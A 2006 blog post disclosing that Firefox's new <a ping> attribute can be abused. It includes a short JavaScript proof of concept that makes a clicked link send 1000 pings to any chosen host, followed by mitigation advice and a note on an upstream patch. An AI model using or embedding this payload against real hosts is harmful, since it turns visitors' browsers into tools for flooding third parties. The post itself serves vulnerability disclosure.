Mon, 14 Aug 2006

firefox's new <a ping> vuln^H^H^H^Hfeature

As seen recently on slashdot, one of the latest trunk builds of Firefox contains support for the ping attribute on anchor and area tags (spec). Ideally, this feature will allow websites to contain links such as: 

<a href="http://foo" ping="http://bar">biz</a>
After looking into it a bit more, I found a way to trigger a user's Firefox to SYN flood any given host upon clicking a link. 
<script language="JavaScript">
    document.write('<a href="http://foobar" ping="');
    for (var i = 0; i < 1000; i++)
        document.write('URI ');
    document.write('">Weeee!</a>');
</script>

When clicked, the link will cause the client to kick 1000 SYN packets over to the specified ping URI without hesitation. This feature is present in Firefox > 1.6a1, and is enabled by default. You can disable this in about:config by flipping off the browser.send_pings boolean. I filed a bug upstream about this issue, and supplied a patch to de-dupe the ping URI list (which might actually not be the best solution to this problem (limiting the number of ping URI's, or kill the pings when the page is left, or the stop button is pressed might be better solutions), but it is still under discussion).



posted at: 13:49 | link | Tags: , | 0 comments


Name:


E-mail:


URL:


Comment: